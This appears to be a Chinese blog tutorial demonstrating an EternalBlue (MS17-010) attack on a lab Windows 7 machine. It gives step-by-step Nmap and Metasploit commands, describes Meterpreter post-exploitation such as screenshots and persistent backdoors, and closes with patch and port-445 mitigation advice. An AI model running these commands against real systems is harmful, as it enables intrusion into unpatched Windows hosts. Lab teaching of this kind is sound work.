警告:本文演示的方法仅用于演示且具有攻击性,请读者务必不可以身试法!
漏洞威胁
影响范围
Windows XP | Windows 7 | Windows10 |
Windows Server 2003 | Windows Server2008 R2 | Windows Server 2012 R2 |
Windows Vista | Windows 8.1 | Windows Server 2016 |
Windows Server 2008 | Windows Server 2012 |
测试环境
主机 | IP地址 | 工具 |
Kali Linux | 192.168.144.128 | Nmap |
Windows 7 | 192.168.144.129 | Metasploit |
Nmap扫描漏洞
nmap --script=vuln 192.168.144.129
打开Metasploit
msfconsole
使用永恒之蓝攻击模块
use exploit/windows/smb/ms17_010_eternalblue
设置攻击载荷
set payload
设置rhosts
set rhosts 192.168.144.129
开始攻击
exploit
Meterpreter 是 Metasploit 的一个扩展模块,可以调用 Metasploit 的一些功能,
对目标系统进行更深入的渗透,如获取屏幕、上传/下载文件、创建持久后门等。
捕获屏幕
screenshot
分享一些命令
MS17-010修复方案
https://docs.microsoft.com/zh-cn/security-updates/securitybulletins/2017/ms17-010
关闭445端口。 打开防火墙,安装安全软件。 安装对应补丁。
© 版权声明
THE END
请登录后查看评论内容